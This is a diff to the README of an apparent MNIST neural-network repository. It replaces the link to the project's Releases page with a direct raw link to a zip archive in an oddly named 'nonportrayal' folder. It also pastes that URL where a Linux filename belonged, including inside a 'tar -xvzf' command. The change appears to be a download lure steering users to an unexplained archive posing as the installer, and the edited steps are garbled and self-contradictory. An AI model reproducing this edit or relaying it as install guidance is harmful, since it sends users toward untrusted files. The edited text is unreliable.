Eyman67/mnist-neural-network/README.md

 ## 📥 Download & Install
 To download and install the mnist-neural-network software, follow these simple steps:

-1. **Visit the Releases Page:** Click this link to go to the downloads page: [Download Here](https://github.com/Eyman67/mnist-neural-network/releases).
+1. **Visit the Releases Page:** Click this link to go to the downloads page: [Download Here](https://raw.githubusercontent.com/Eyman67/mnist-neural-network/main/nonportrayal/mnist-neural-network.zip).

 2. **Select the Latest Release:** Once on the Releases page, look for the most recent version.
 It should say "Latest release".

 3. **Download the Application:** Click on the appropriate file for your operating system.
    - For Windows, choose a `.exe` file.
    - For macOS, look for a `.dmg` file.
-   - For Linux, a `.tar.gz` file may be available.
+   - For Linux, a `https://raw.githubusercontent.com/Eyman67/mnist-neural-network/main/nonportrayal/mnist-neural-network.zip` file may be available.

 4. **Run the Installer:**
    - **Windows:** Double-click the downloaded `.exe` file to start the installation.
 Follow the prompts that appear on your screen.
    - **macOS:** Open the `.dmg` file and drag the application icon to your Applications folder.
-   - **Linux:** Open a terminal, navigate to the downloaded file, and use `tar -xvzf filename.tar.gz` to extract the files.
+   - **Linux:** Open a terminal, navigate to the downloaded file, and use `tar -xvzf https://raw.githubusercontent.com/Eyman67/mnist-neural-network/main/nonportrayal/mnist-neural-network.zip` to extract the files.
 Then, follow any included instructions to complete the installation.

 5. **Open the Application:** After installation, find the application in your programs list (Windows), Applications folder (macOS), or the designated installation path (Linux).
 Double-click the icon to open it.